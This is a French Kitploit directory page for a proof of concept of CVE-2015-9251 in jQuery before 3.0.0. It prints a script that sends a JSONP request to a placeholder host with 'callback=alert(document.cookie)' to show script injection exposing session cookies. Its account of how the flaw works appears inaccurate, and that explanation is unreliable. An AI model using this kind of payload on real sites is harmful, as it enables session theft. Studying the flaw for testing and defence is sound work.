Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2015-9251 — PoC pour CVE-2015-9251 jQuery inférieur à 3.0.0. | Kitploit
Outils/GitHubGitHub/moften/cve-2015-9251
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubmoften/cve-2015-9251

CVE-2015-9251

PoC pour CVE-2015-9251 jQuery inférieur à 3.0.0.

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2015-9251

[email protected]

PoC pour CVE-2015-9251 jQuery inférieur à 3.0.0.

CVE-2015-9251 - PoC Exploit

Ce dépôt contient une Preuve de concept (PoC) pour la vulnérabilité CVE-2015-9251 dans la bibliothèque jQuery. La vulnérabilité permet une attaque de Cross-Site Scripting (XSS) via des appels JSONP sans assainissement, car jQuery permet l'injection de code dans le paramètre callback dans les versions antérieures à la 3.0.0.


Description

CVE-2015-9251 affecte les versions de jQuery antérieures à la 3.0.0. La vulnérabilité est exploitée en manipulant le paramètre callback dans une requête JSONP, ce qui peut permettre l'exécution de code JavaScript arbitraire dans le navigateur de la victime. Cela peut entraîner l'exposition de données sensibles, comme les cookies de session.

Prérequis

  1. Environnement de test : L'application web vulnérable doit utiliser une version de jQuery inférieure à 3.0.0.
  2. Navigateur Web : Pour exécuter le PoC et observer le comportement de l'exploit.
Télécharger l’outil
  • Outil d'inspection : Les DevTools du navigateur seront utiles pour voir les résultats.

  • Exécution du PoC

    Pour exécuter le PoC, suivez ces étapes :

    1. Copier et coller le code dans la console du navigateur ou l'inclure dans une page HTML de test.

    Code du PoC :

    root@kitploit:~
    <script src="https://code.jquery.com/jquery-1.11.3.min.js"></script>
    <script>
      // Función que simula una solicitud a un servidor vulnerable
      $.ajax({
        url: "https://example.com/api?callback=alert(document.cookie)",
        dataType: "jsonp", // JSONP permite la ejecución de código en JSONP callbacks
        success: function(response) {
          console.log(response);
        }
      });
    </script>